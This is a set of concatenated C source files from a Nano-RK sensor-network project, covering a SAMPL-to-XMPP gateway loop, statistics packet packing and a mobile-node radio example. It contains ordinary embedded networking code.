tx_buf[SUBNET_MAC_1]=gw_subnet_1;
tx_buf[SUBNET_MAC_0]=gw_subnet_0;
tx_buf[DS_LAST_HOP_MAC]=gw_mac;
tx_buf[SEQ_NUM]=seq_num;
tx_buf[DS_AES_CTR_0]=seq_num;
if(tx_buf[DS_AES_CTR_0]==255) tx_buf[DS_AES_CTR_1]++;
if(tx_buf[DS_AES_CTR_1]==255) tx_buf[DS_AES_CTR_2]++;
if(tx_buf[DS_AES_CTR_2]==255) tx_buf[DS_AES_CTR_3]++;
if(error_debug_txt_flag==1) printf( "128: About to unpack gw pkt\n" );
unpack_downstream_packet( &ds_pkt, 0 );
if(error_debug_txt_flag==1) printf( "130: gw pkt unpacked\n" );
if(debug_txt_flag==1)
print_ds_packet(&ds_pkt );
if(i<21 )
{
error=1;
printf( "Error parsing input file!\n" );
}
seq_num++;
nav_time_secs=tx_buf[DS_NAV];
reply_time_secs=tx_buf[DS_DELAY_PER_LEVEL] * tx_buf[DS_HOP_MAX];
cmd_ready=1;
}
}
if(error_debug_txt_flag==1) printf( "149: Done parsing file\n" );
// Send the packet
if(len>128) len=128;
if(!no_slip_flag && error==0)
v=slipstream_send(tx_buf,len);
if(error_debug_txt_flag==1) printf( "154: Slipstream sent\n" );
if(debug_txt_flag==1)
{
if (v == 0) printf( "Error sending\n" );
else printf( "Sent request %d\n",tx_buf[SEQ_NUM]);
}
t=time(NULL);
reply_timeout=t+reply_time_secs+1;
nav_timeout=t+nav_time_secs;
if(error_debug_txt_flag==1) printf( "165: Waiting for reply\n" );
// Collect Reply packets
while(reply_timeout>time(NULL))
{
v=slipstream_receive( rx_buf);
if (v > 0) {
if(error_debug_txt_flag==1) printf( "171: before in pkt: v= %d\n",v );
handle_incomming_pkt(rx_buf,v);
if(error_debug_txt_flag==1) printf( "173: after in pkt\n" );
}
usleep(1000);
}
if(debug_txt_flag==1) printf( "reply wait timeout...\n" );
// Wait for the NAV and service incoming messages
// This is the time window when the network is idle and can
// be used for asynchronous communications.
while(nav_timeout>time(NULL))
{
v=slipstream_receive( rx_buf);
if (v > 0) {
if(error_debug_txt_flag==1) printf( "186: before in pkt: v= %d\n",v );
handle_incomming_pkt(rx_buf,v);
if(error_debug_txt_flag==1) printf( "188: after in pkt\n" );
// Check if TX queue has data and send the request
}
usleep(1000);
}
if(error_debug_txt_flag==1) printf( "194: Done with rx/tx cycle\n" );
}
}
int main (int argc, char *argv[])
{
GThread *main_thread = NULL;
GError *error = NULL;
GMainLoop *main_loop = NULL;
uint32_t gw_mac_addr_full;
char name[64];
char xmpp_file_name[128];
char sampl_file_name[128];
char password[64];
char xmpp_server[64];
char xmpp_ssl_fingerprint[64];
char pubsub_server[64];
char username[64];
uint32_t xmpp_server_port;
uint8_t param;
int32_t v,ret;
debug_txt_flag=0;
xmpp_flag=0;
no_slip_flag=0;
print_input_flag=0;
connection=NULL;
if (argc < 4 || argc > 7) {
printf ("Usage: server port gateway_mac [-vxnf] [xmmp_config_name] [sampl_config_name]\n");
printf (" gateway_mac e.g. 0x00000000\n");
printf (" v Print Verbose Debug\n");
printf (" x Send data to XMPP server\n");
printf (" n Don't send SLIP packets (but receive them)\n");
printf (" f Use the following config files instead of the defaults\n");
exit (1);
}
sscanf( argv[3],"%x",&gw_mac_addr_full );
printf( "GW mac: 0x%08x\n",gw_mac_addr_full );
gw_subnet_2=gw_mac_addr_full>>24;
gw_subnet_1=gw_mac_addr_full>>16;
gw_subnet_0=gw_mac_addr_full>>8;
gw_mac=gw_mac_addr_full&0xff;
strcpy( xmpp_file_name, "xmpp_config.txt" );
strcpy( sampl_file_name, "ff_config.txt" );
if(argc>3)
{
// Grab dash command line options
if(strstr(argv[4],"v")!=NULL )
{
printf( "Verbose Mode ON\n" );
debug_txt_flag=1;
}
if(strstr(argv[4],"x")!=NULL )
{
printf( "XMPP ON\n" );
xmpp_flag=1;
}
if(strstr(argv[4],"n")!=NULL )
{
printf( "SLIP TX OFF\n" );
no_slip_flag=1;
}
if(strstr(argv[4],"f")!=NULL )
{
printf( "Loading XMPP config: " );
strcpy(xmpp_file_name, argv[5]);
printf( "%s\n",xmpp_file_name );
printf( "Loading SAMPL config: " );
strcpy(sampl_file_name, argv[6]);
printf( "%s\n",sampl_file_name );
}
}
if(xmpp_flag)
{
fp=fopen( xmpp_file_name,"r" );
if(fp==NULL)
{
printf( "XMPP config: No %s file!\n",xmpp_file_name );
exit(0);
}
param=0;
do {
v=fscanf( fp, "%[^\n]\n", buf);
if(buf[0]!='#' && v!=-1)
{
switch(param)
{
case 0: strcpy(username,buf); break;
case 1: strcpy(password,buf); break;
case 2: strcpy(xmpp_server,buf); break;
case 3: xmpp_server_port=atoi(buf); break;
case 4: strcpy(pubsub_server,buf); break;
case 5: strcpy(xmpp_ssl_fingerprint,buf); break;
}
param++;
}
}while(v!=-1 && param<6 );
if(debug_txt_flag)
{
printf( "XMPP Client Configuration:\n" );
printf( " username: %s\n",username );
printf( " password: %s\n",<PASSWORD>);
printf( " xmpp server: %s\n",xmpp_server);
printf( " xmpp server port: %d\n",xmpp_server_port);
printf( " xmpp pubsub server: %s\n",pubsub_server);
printf( " xmpp ssl fingerprint: %s\n\n",xmpp_ssl_fingerprint);
}
if(param<4)
{
printf( "Not enough xmpp configuration parameters in xmpp_config.txt\n" );
exit(0);
}
connection = start_xmpp_client(username,
password,
xmpp_server,
xmpp_server_port,
xmpp_ssl_fingerprint,
pubsub_server,
handle_xmpp_msgs );
if(connection == NULL) {
g_printerr("Could not start client.\n");
return -1;
}
fclose(fp);
if(debug_txt_flag) printf("Initialized XMPP client\n");
}
fp=fopen( sampl_file_name,"r" );
if(fp==NULL) {
printf( "SAMPL config: No %s file!\n",sampl_file_name );
printf( "This is required for sending control commands\n" );
exit(0);
}
// clear list of nodes
node_list_init();
seq_num_cache_init();
cal_load_params("sensor_cal.txt");
strcpy(slip_server,argv[1]);
slip_port=atoi(argv[2]);
g_thread_init (NULL);
main_loop = g_main_loop_new(NULL,FALSE);
main_thread =
g_thread_create ((GThreadFunc) main_publish_loop, connection, TRUE, &error);
if (error != NULL) {
g_printerr ("Thread creation error: <%s>\n", error->message);
return -1;
}
g_print("created thread\n");
g_main_loop_run (main_loop);
}
void handle_incomming_pkt(uint8_t *rx_buf,uint8_t len)
{
int i,ret;
int pkt_type;
uint8_t mac[4];
char node_name[MAX_NODE_LEN];
SAMPL_GATEWAY_PKT_T gw_pkt;
SAMPL_PEER_2_PEER_PKT_T p2p_pkt;
if(debug_txt_flag==1)
{
printf( "Incomming Pkt [%d] = ",len );
for(i=0; i<len; i++ ) printf( "%d ",rx_buf[i] );
printf( "\n" );
}
pkt_type=IGNORE_PACKET;
if((rx_buf[CTRL_FLAGS] & US_MASK) != 0 && ((rx_buf[CTRL_FLAGS] & DS_MASK) !=0 ))
pkt_type=P2P_PACKET;
else if ((rx_buf[CTRL_FLAGS] & US_MASK) != 0 && (rx_buf[CTRL_FLAGS] & DS_MASK) == 0)
pkt_type=US_PACKET;
else pkt_type=IGNORE_PACKET;
mac[3]=rx_buf[SUBNET_MAC_2];
mac[2]=rx_buf[SUBNET_MAC_1];
mac[1]=rx_buf[SUBNET_MAC_0];
mac[0]=rx_buf[GW_SRC_MAC];
printf("checking: %02x%02x%02x%02x\n",mac[3],
mac[2],
mac[1],
mac[0] );
// Check if it is a repeat packet
if( seq_num_cache_check( mac , rx_buf[SEQ_NUM],rx_buf[PKT_TYPE])==1)
{
if(debug_txt_flag==1) printf( "DUPLICATE PACKET!\n" );
sprintf(node_name,"%02x%02x%02x%02x",rx_buf[SUBNET_MAC_2],
rx_buf[SUBNET_MAC_1],
rx_buf[SUBNET_MAC_0],
rx_buf[GW_SRC_MAC] );
printf( "mac=%s seq_num=%d type=%d\n",node_name, rx_buf[SEQ_NUM],rx_buf[PKT_TYPE]);
} else
{
// Create an event node if it doesn't already exist and if it is an infrastructure node
if(xmpp_flag==1)
{
if(pkt_type!=IGNORE_PACKET && (rx_buf[CTRL_FLAGS] & MOBILE_MASK) !=0)
{
sprintf(node_name,"%02x%02x%02x%02x",rx_buf[SUBNET_MAC_2],
rx_buf[SUBNET_MAC_1],
rx_buf[SUBNET_MAC_0],
rx_buf[GW_LAST_HOP_MAC] );
check_and_create_node(node_name);
}
}
// The only p2p packet that we understand from a mobile node is the XMPP_MSG
if(pkt_type==P2P_PACKET &&
(rx_buf[CTRL_FLAGS] & MOBILE_MASK) !=0 &&
rx_buf[PKT_TYPE]!=XMPP_PKT ) pkt_type=IGNORE_PACKET;
gw_pkt.buf=rx_buf;
gw_pkt.buf_len=len;
unpack_gateway_packet(&gw_pkt );
if(debug_txt_flag==1) printf( "Calling pkt handler for pkt_type %d\n",gw_pkt.pkt_type );
switch(gw_pkt.pkt_type)
{
case PING_PKT:
case ACK_PKT:
send_xmpp_ping_pkt( &gw_pkt );
if(debug_txt_flag==1) printf( "PING or ACK packet\n" );
break;
case XMPP_PKT:
xmpp_pkt_handler( &gw_pkt );
if(debug_txt_flag==1) printf( "XMPP packet\n" );
break;
case EXTENDED_NEIGHBOR_LIST_PKT:
extended_nlist_pkt_handler( &gw_pkt );
if(debug_txt_flag==1) printf( "Extended Neighbor List packet\n" );
break;
case FF_SENSOR_SHORT_PKT:
send_xmpp_sensor_short_pkt( &gw_pkt );
if(debug_txt_flag==1) printf( "SENSOR_SHORT packet\n" );
break;
case TRACEROUTE_PKT:
if(debug_txt_flag==1) printf( "TRACEROUTE packet\n" );
break;
default:
if(debug_txt_flag==1) printf( "Unknown Packet\n" );
}
}
printf( "done with handle pkt\n" );
}
void error(char *msg)
{
perror(msg);
exit(0);
}
void print_ds_packet(SAMPL_DOWNSTREAM_PKT_T *ds_pkt )
{
int i;
printf( "Downstream Packet Header info:\n" );
printf( " pkt type\t\t0x%x\n",ds_pkt->pkt_type);
printf( " ctrl flags\t\t0x%x\n",ds_pkt->ctrl_flags );
printf( " seq num\t\t0x%x\n",ds_pkt->seq_num );
printf( " priority\t\t0x%x\n",ds_pkt->priority);
printf( " ack retry\t\t0x%x\n",ds_pkt->ack_retry);
printf( " subnet mac\t\t0x%x\n",ds_pkt->subnet_mac[0]);
printf( " hop_cnt\t\t0x%x\n",ds_pkt->hop_cnt);
printf( " hop_max\t\t0x%x\n",ds_pkt->hop_max);
printf( " delay_per_level\t%d seconds\n",ds_pkt->delay_per_level);
printf( " nav\t\t\t%d seconds\n",ds_pkt->nav);
printf( " mac_check_rate\t%d ms\n",ds_pkt->mac_check_rate);
printf( " rssi_threshold\t%d\n",(int8_t)(ds_pkt->rssi_threshold));
printf( " last_hop_mac\t\t0x%x\n",ds_pkt->last_hop_mac);
printf( " mac_filter_num\t0x%x\n",ds_pkt->mac_filter_num);
printf( " aes_ctr\t\t0x%x 0x%x 0x%x 0x%x\n",ds_pkt->aes_ctr[3], ds_pkt->aes_ctr[3],
ds_pkt->aes_ctr[2], ds_pkt->aes_ctr[1], ds_pkt->aes_ctr[0]);
printf( "Mac Filter List: " );
for(i=0; i<ds_pkt->mac_filter_num; i++ )
printf( "0x%x ",ds_pkt->buf[DS_PAYLOAD_START+i] );
printf( "\n\n" );
printf( "Payload Data: " );
for(i=0; i<ds_pkt->payload_len; i++ )
printf( "0x%x ",ds_pkt->payload[i] );
printf( "\n\n" );
}
void seq_num_cache_init()
{
int i;
for(i=0; i<SEQ_CACHE_SIZE; i++ ) seq_cache[i].valid=0;
}
// This function returns 1 if the packet is a repeat and should be suppressed.
// It returns 0 if the packet is unique.
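// Each cache entry carries a TTL: "valid" is reset to 100 on a hit and
// decremented once per received packet, so stale address entries age out
// and their slots can be reused by new senders.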
int seq_num_cache_check( uint8_t *mac_addr, uint8_t seq_num, uint8_t pkt_type)
{
int i,j;
int match;
/*
for(i=0; i<SEQ_CACHE_SIZE; i++ )
{
if(seq_cache[i].valid!=0) printf( "cache %d: mac %02x%02x%02x%02x seq=%d type=%d ttl=%d\n",
i, seq_cache[i].addr[3],seq_cache[i].addr[2],seq_cache[i].addr[1],
seq_cache[i].addr[0],seq_cache[i].seq_num, seq_cache[i].pkt_type, seq_cache[i].valid );
}
*/
// This is to stop caching SAMPL reply packets.
// Reply packets all come from the gateway with the same
// seq number and packet type
if( mac_addr[0]==gw_mac &&
mac_addr[1]==gw_subnet_0 &&
mac_addr[2]==gw_subnet_1 &&
mac_addr[3]==gw_subnet_2 ) return 0;
for(i=0; i<SEQ_CACHE_SIZE; i++ )
{
if(seq_cache[i].valid>0)
{
seq_cache[i].valid--;
if( mac_addr[0]==seq_cache[i].addr[0] &&
mac_addr[1]==seq_cache[i].addr[1] &&
mac_addr[2]==seq_cache[i].addr[2] &&
mac_addr[3]==seq_cache[i].addr[3] )
{
seq_cache[i].valid=100;
// This is a repeat packet
if(seq_num==seq_cache[i].seq_num && pkt_type==seq_cache[i].pkt_type)
{
return 1;
}
else
{
seq_cache[i].seq_num=seq_num;
seq_cache[i].pkt_type=pkt_type;
return 0;
}
}
}
}
for(i=0; i<SEQ_CACHE_SIZE; i++ )
{
if(seq_cache[i].valid==0)
{
seq_cache[i].addr[0]=mac_addr[0];
seq_cache[i].addr[1]=mac_addr[1];
seq_cache[i].addr[2]=mac_addr[2];
seq_cache[i].addr[3]=mac_addr[3];
seq_cache[i].seq_num=seq_num;
seq_cache[i].pkt_type=pkt_type;
seq_cache[i].valid=100;
return 0;
}
}
return 0;
}
<file_sep>/ISA100.11a-master/ISA100_11a/11-2/current/nano-RK-well-sync/projects/SAMPL/pkt_handlers/.svn/text-base/stats_pkt.c.svn-base
#include <globals.h>
#include <../include/sampl.h>
#include <stats_pkt.h>
#ifdef NANORK
#include <nrk.h>
#include <nrk_error.h>
#include <debug.h>
#else
#define my_mac 0
#define RF_MAX_PAYLOAD_SIZE 128
#endif
#ifdef NANORK
int8_t stats_generate(SAMPL_UPSTREAM_PKT_T *pkt, SAMPL_DOWNSTREAM_PKT_T *ds_pkt)
{
STATS_PKT_T p;
debug_update();
p.mac_addr=my_mac;
p.mac_addr=my_mac;
p.tx_pkts=debug_stats.tx_pkts;
p.tx_retry=debug_stats.tx_retry;
p.sensor_samples=debug_stats.sensor_samples;
p.uptime=debug_stats.uptime.secs;
p.deep_sleep=debug_stats.deep_sleep.secs;
p.idle_time=debug_stats.idle_time.secs;
pkt->payload_len = stats_pkt_add( &p, pkt->payload,0);
pkt->num_msgs=1;
return NRK_OK;
}
int8_t stats_aggregate(SAMPL_UPSTREAM_PKT_T *in, SAMPL_UPSTREAM_PKT_T *out)
{
uint8_t len,i,j,k,dup;
STATS_PKT_T p1, p2;
//if(in->next_hop_dst_mac!=my_mac ) nrk_kprintf( PSTR( "aggregating bad packet!\r\n" ));
for(i=0; i<in->num_msgs; i++ )
{
dup=0;
// get next ping packet to compare against current outgoing list
stats_pkt_get( &p1, in->payload, i );
for(k=0; k<out->num_msgs; k++ )
{
// get packet from outgoing list and compare against incoming packet
stats_pkt_get( &p2, out->payload, k );
if(p1.mac_addr==p2.mac_addr ) dup=1;
}
if(dup==0)
{
// if packet is unique, add to outgoing packet
out->payload_len=stats_pkt_add( &p1, out->payload, out->num_msgs );
out->num_msgs++;
}
}
return NRK_OK;
}
#endif
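/*
 * Wire layout note (derived from the pack/unpack code below): each record
 * occupies STATS_PKT_SIZE bytes, big-endian, in the order mac_addr (1
 * byte), rx_pkts, tx_pkts, tx_retry and sensor_samples (2 bytes each),
 * then uptime, deep_sleep and idle_time (4 bytes each).
 */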
void stats_pkt_get( STATS_PKT_T *p, uint8_t *buf, uint8_t index )
{
p->mac_addr=buf[index*STATS_PKT_SIZE];
p->rx_pkts=((uint16_t)buf[index*STATS_PKT_SIZE+1]<<8)|buf[index*STATS_PKT_SIZE+2];
p->tx_pkts=((uint16_t)buf[index*STATS_PKT_SIZE+3]<<8)|buf[index*STATS_PKT_SIZE+4];
p->tx_retry=((uint16_t)buf[index*STATS_PKT_SIZE+5]<<8)|buf[index*STATS_PKT_SIZE+6];
p->sensor_samples=((uint16_t)buf[index*STATS_PKT_SIZE+7]<<8)|buf[index*STATS_PKT_SIZE+8];
p->uptime=((uint32_t)buf[index*STATS_PKT_SIZE+9]<<24)|
((uint32_t)buf[index*STATS_PKT_SIZE+10]<<16)|
((uint32_t)buf[index*STATS_PKT_SIZE+11]<<8)|
((uint32_t)buf[index*STATS_PKT_SIZE+12]);
p->deep_sleep=((uint32_t)buf[index*STATS_PKT_SIZE+13]<<24)|
((uint32_t)buf[index*STATS_PKT_SIZE+14]<<16)|
((uint32_t)buf[index*STATS_PKT_SIZE+15]<<8)|
((uint32_t)buf[index*STATS_PKT_SIZE+16]);
p->idle_time=((uint32_t)buf[index*STATS_PKT_SIZE+17]<<24)|
((uint32_t)buf[index*STATS_PKT_SIZE+18]<<16)|
((uint32_t)buf[index*STATS_PKT_SIZE+19]<<8)|
((uint32_t)buf[index*STATS_PKT_SIZE+20]);
}
uint8_t stats_pkt_add( STATS_PKT_T *p, uint8_t *buf, uint8_t index )
{
if((index+1)*STATS_PKT_SIZE>MAX_PKT_PAYLOAD ) return (index*STATS_PKT_SIZE);
buf[index*STATS_PKT_SIZE]= p->mac_addr;
buf[index*STATS_PKT_SIZE+1]= (p->rx_pkts>>8)&0xff;
buf[index*STATS_PKT_SIZE+2]= (p->rx_pkts)&0xff;
buf[index*STATS_PKT_SIZE+3]= (p->tx_pkts>>8)&0xff;
buf[index*STATS_PKT_SIZE+4]= (p->tx_pkts)&0xff;
buf[index*STATS_PKT_SIZE+5]= (p->tx_retry>>8)&0xff;
buf[index*STATS_PKT_SIZE+6]= (p->tx_retry)&0xff;
buf[index*STATS_PKT_SIZE+7]= (p->sensor_samples>>8)&0xff;
buf[index*STATS_PKT_SIZE+8]= (p->sensor_samples)&0xff;
buf[index*STATS_PKT_SIZE+9]= (p->uptime>>24)&0xff;
buf[index*STATS_PKT_SIZE+10]= (p->uptime>>16)&0xff;
buf[index*STATS_PKT_SIZE+11]= (p->uptime>>8)&0xff;
buf[index*STATS_PKT_SIZE+12]= (p->uptime)&0xff;
buf[index*STATS_PKT_SIZE+13]= (p->deep_sleep>>24)&0xff;
buf[index*STATS_PKT_SIZE+14]= (p->deep_sleep>>16)&0xff;
buf[index*STATS_PKT_SIZE+15]= (p->deep_sleep>>8)&0xff;
buf[index*STATS_PKT_SIZE+16]= (p->deep_sleep)&0xff;
buf[index*STATS_PKT_SIZE+17]= (p->idle_time>>24)&0xff;
buf[index*STATS_PKT_SIZE+18]= (p->idle_time>>16)&0xff;
buf[index*STATS_PKT_SIZE+19]= (p->idle_time>>8)&0xff;
buf[index*STATS_PKT_SIZE+20]= (p->idle_time)&0xff;
return ((index+1)*STATS_PKT_SIZE);
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/projects/SAMPL/mobile-example/mobile-multithread/main.c
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
*******************************************************************************/
#include <nrk.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
#include <avr/sleep.h>
#include <hal.h>
#include <bmac.h>
#include <nrk_error.h>
#include <slip.h>
#include "../../include/tree_route.h"
#define MAX_SLIP_BUF 128
#define my_subnet_mac 1
#define my_mac 100
#define TXT_DEBUG
nrk_task_type RX_TASK;
NRK_STK rx_task_stack[NRK_APP_STACKSIZE];
void rx_task (void);
nrk_task_type TX_TASK;
NRK_STK tx_task_stack[NRK_APP_STACKSIZE];
void tx_task (void);
void nrk_create_taskset ();
uint8_t slip_rx_buf[MAX_SLIP_BUF];
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t rx_buf[RF_MAX_PAYLOAD_SIZE];
SAMPL_MOBILE_PKT_T mobile_pkt;
int main ()
{
uint16_t div;
nrk_setup_ports ();
nrk_setup_uart (UART_BAUDRATE_115K2);
nrk_init ();
nrk_led_clr (0);
nrk_led_clr (1);
nrk_led_clr (2);
nrk_led_clr (3);
nrk_time_set (0, 0);
bmac_task_config ();
nrk_create_taskset ();
nrk_start ();
return 0;
}
void rx_task ()
{
uint8_t i, len;
int8_t rssi, val;
uint8_t *local_rx_buf;
nrk_time_t check_period;
printf ("rx_task PID=%d\r\n", nrk_get_pid ());
// init bmac on channel 26
bmac_init (26);
// By default the RX check rate is 100ms
// below shows how to change that
//check_period.secs=0;
//check_period.nano_secs=200*NANOS_PER_MS;
//val=bmac_set_rx_check_rate(check_period);
// The default Clear Channel Assement RSSI threshold is -45
// Setting this value higher means that you will only trigger
// receive with a very strong signal. Setting this lower means
// bmac will try to receive fainter packets. If the value is set
// too high or too low performance will suffer greatly.
// bmac_set_cca_thresh(-45);
// val is only set by the bmac_set_rx_check_rate() call above; enable this
// check together with that call.
//if(val==NRK_ERROR) nrk_kprintf( PSTR("ERROR setting bmac rate\r\n" ));
// This sets the next RX buffer.
// This can be called at anytime before releaseing the packet
// if you wish to do a zero-copy buffer switch
bmac_rx_pkt_set_buffer (rx_buf, RF_MAX_PAYLOAD_SIZE);
while (1) {
// Wait until an RX packet is received
val = bmac_wait_until_rx_pkt ();
// Get the RX packet
local_rx_buf = bmac_rx_pkt_get (&len, &rssi);
printf ("Got RX packet len=%d RSSI=%d [", len, rssi);
for (i = 0; i < len; i++) printf ("%d ", rx_buf[i]); printf ("]\r\n");
if((local_rx_buf[PKT_TYPE]|MOBILE_MASK)!=0)
{
if(local_rx_buf[PKT_TYPE]==(PING_PKT|MOBILE_MASK))
{
#ifdef TXT_DEBUG
mobile_pkt.pkt_type=local_rx_buf[PKT_TYPE];
mobile_pkt.subnet_mac=local_rx_buf[MOBILE_SUBNET_MAC];
mobile_pkt.src_mac=local_rx_buf[MOBILE_SRC_MAC];
mobile_pkt.dst_mac=local_rx_buf[MOBILE_DST_MAC];
if(mobile_pkt.dst_mac==my_mac || mobile_pkt.dst_mac==BROADCAST )
{
nrk_led_set(GREEN_LED);
// Packet arrived and is good to go
printf( "src: %d ",mobile_pkt.src_mac);
printf( "rssi: %d ",rssi);
printf( "subnet: %d ",mobile_pkt.subnet_mac);
printf( "type: %d ",mobile_pkt.pkt_type);
nrk_kprintf (PSTR ("["));
for (i = MOBILE_PAYLOAD_START; i < len; i++)
printf ("%d ", rx_buf[i]);
nrk_kprintf (PSTR ("]\r\n"));
}
#endif
}
}
// Release the RX buffer so future packets can arrive
bmac_rx_pkt_release ();
}
}
void tx_task ()
{
uint8_t j, i, val, cnt,error;
int8_t len;
nrk_sig_t tx_done_signal;
nrk_sig_mask_t ret;
nrk_time_t check_period;
SAMPL_DOWNSTREAM_PKT_T ds_pkt;
printf ("tx_task PID=%d\r\n", nrk_get_pid ());
slip_init (stdin, stdout, 0, 0);
nrk_kprintf( PSTR("slip_init()\r\n" ));
// Wait until the tx_task starts up bmac
// This should be called by all tasks using bmac that
// do not call bmac_init()...
while (!bmac_started ())
nrk_wait_until_next_period ();
nrk_kprintf( PSTR("bmac_started()\r\n" ));
check_period.secs=0;
check_period.nano_secs=100*NANOS_PER_MS;
val=bmac_set_rx_check_rate(check_period);
// Get and register the tx_done_signal if you want to
// do non-blocking transmits
tx_done_signal = bmac_get_tx_done_signal ();
nrk_signal_register (tx_done_signal);
cnt = 0;
// Send initial flood at 100ms checkrate
check_period.secs=0;
check_period.nano_secs=100*NANOS_PER_MS;
val=bmac_set_rx_check_rate(check_period);
while (1) {
// Build a TX packet by hand...
tx_buf[PKT_TYPE]=PING_PKT | MOBILE_MASK;
tx_buf[CTRL_FLAGS]=0;
tx_buf[MOBILE_SUBNET_MAC]=BROADCAST;
tx_buf[MOBILE_SRC_MAC]=my_mac;
tx_buf[MOBILE_DST_MAC]=BROADCAST;
len=MOBILE_PAYLOAD_START;
nrk_led_set (BLUE_LED);
check_period.secs=0;
check_period.nano_secs=100*NANOS_PER_MS;
val=bmac_set_rx_check_rate(check_period);
// For blocking transmits, use the following function call.
// For this there is no need to register
val=bmac_tx_pkt(tx_buf, len);
check_period.secs=0;
check_period.nano_secs=25*NANOS_PER_MS;
val=bmac_set_rx_check_rate(check_period);
#ifdef TXT_DEBUG
nrk_kprintf (PSTR ("\r\nSent packet!\r\n"));
#endif
nrk_led_clr (BLUE_LED);
nrk_led_clr (GREEN_LED);
nrk_wait_until_next_period();
}
}
void nrk_create_taskset ()
{
RX_TASK.task = rx_task;
nrk_task_set_stk( &RX_TASK, rx_task_stack, NRK_APP_STACKSIZE);
RX_TASK.prio = 2;
RX_TASK.FirstActivation = TRUE;
RX_TASK.Type = BASIC_TASK;
RX_TASK.SchType = PREEMPTIVE;
RX_TASK.period.secs = 1;
RX_TASK.period.nano_secs = 0;
RX_TASK.cpu_reserve.secs = 1;
RX_TASK.cpu_reserve.nano_secs = 500 * NANOS_PER_MS;
RX_TASK.offset.secs = 0;
RX_TASK.offset.nano_secs = 0;
nrk_activate_task (&RX_TASK);
TX_TASK.task = tx_task;
nrk_task_set_stk( &TX_TASK, tx_task_stack, NRK_APP_STACKSIZE);
TX_TASK.prio = 2;
TX_TASK.FirstActivation = TRUE;
TX_TASK.Type = BASIC_TASK;
TX_TASK.SchType = PREEMPTIVE;
TX_TASK.period.secs = 5;
TX_TASK.period.nano_secs = 0;
TX_TASK.cpu_reserve.secs = 1;
TX_TASK.cpu_reserve.nano_secs = 500 * NANOS_PER_MS;
TX_TASK.offset.secs = 0;
TX_TASK.offset.nano_secs = 0;
nrk_activate_task (&TX_TASK);
}
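/*
 * Editor's sketch (guarded out of the build): tx_task registers
 * tx_done_signal but then only uses the blocking bmac_tx_pkt().
 * A non-blocking transmit would look like this, assuming a
 * bmac_tx_pkt_nonblocking() call in bmac.h -- treat that name as an
 * assumption and check it against your bmac version.
 */
#ifdef DOC_EXAMPLE_NONBLOCKING_TX
void tx_nonblocking_example (void)
{
  nrk_sig_t tx_done_signal;
  tx_done_signal = bmac_get_tx_done_signal ();
  nrk_signal_register (tx_done_signal);
  /* queue the packet; this returns before the packet is on air */
  bmac_tx_pkt_nonblocking (tx_buf, MOBILE_PAYLOAD_START);
  /* suspend only this task until bmac signals TX completion */
  nrk_event_wait (SIG (tx_done_signal));
}
#endif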
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/projects/final_project/repeater/spi_matrix.c
#include <spi_matrix.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
//#include <error-def.h>
//#include <command-interpreter.h>
MATRIX_TABLE matrixTable[] = {
/*
{1, {{126,0,191}, {0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //1 0
{2, {{116,0,191}, {92,0,127},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //2 1
{2, {{0,84,191}, {0,124,127},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //3 2
{2, {{0,28,191}, {0,124,127},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //4 3
{2, {{0,92,191}, {0,116,127},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //5 4
{2, {{0,126,191}, {0,112,127},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //6 5
{2, {{0,4,191}, {0,124,127},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //7 6
{2, {{0,124,191}, {0,124,127},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //8 7
{2, {{0,28,191}, {0,252,129},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //9 8
{5, {{126,0,254}, {66,0,253},{66,0,251},{82,0,247},{114,0,239},{0,0,0},{0,0,0},{0,0,0}}, 0}, //G 9
{5, {{2,0,254}, {2,0,253},{126,0,251},{2,0,247},{2,0,239},{0,0,0},{0,0,0},{0,0,0}}, 0}, //T 10
{5, {{126,0,254}, {64,0,253},{64,0,251},{64,0,247},{64,0,239},{0,0,0},{0,0,0},{0,0,0}}, 0}, //L 11
{5, {{126,0,254}, {4,0,253},{8,0,251},{16,0,247},{126,0,239},{0,0,0},{0,0,0},{0,0,0}}, 0}, //N 12
{5, {{126,0,254}, {66,0,253},{66,0,251},{66,0,247},{66,0,239},{0,0,0},{0,0,0},{0,0,0}}, 0}, //C 13
*/
{1, {{126,0,253}, {0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //1 0
{2, {{116,0,253}, {92,0,254},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //2 1
{2, {{0,84,253}, {0,124,254},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //3 2
{2, {{0,28,253}, {0,124,254},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //4 3
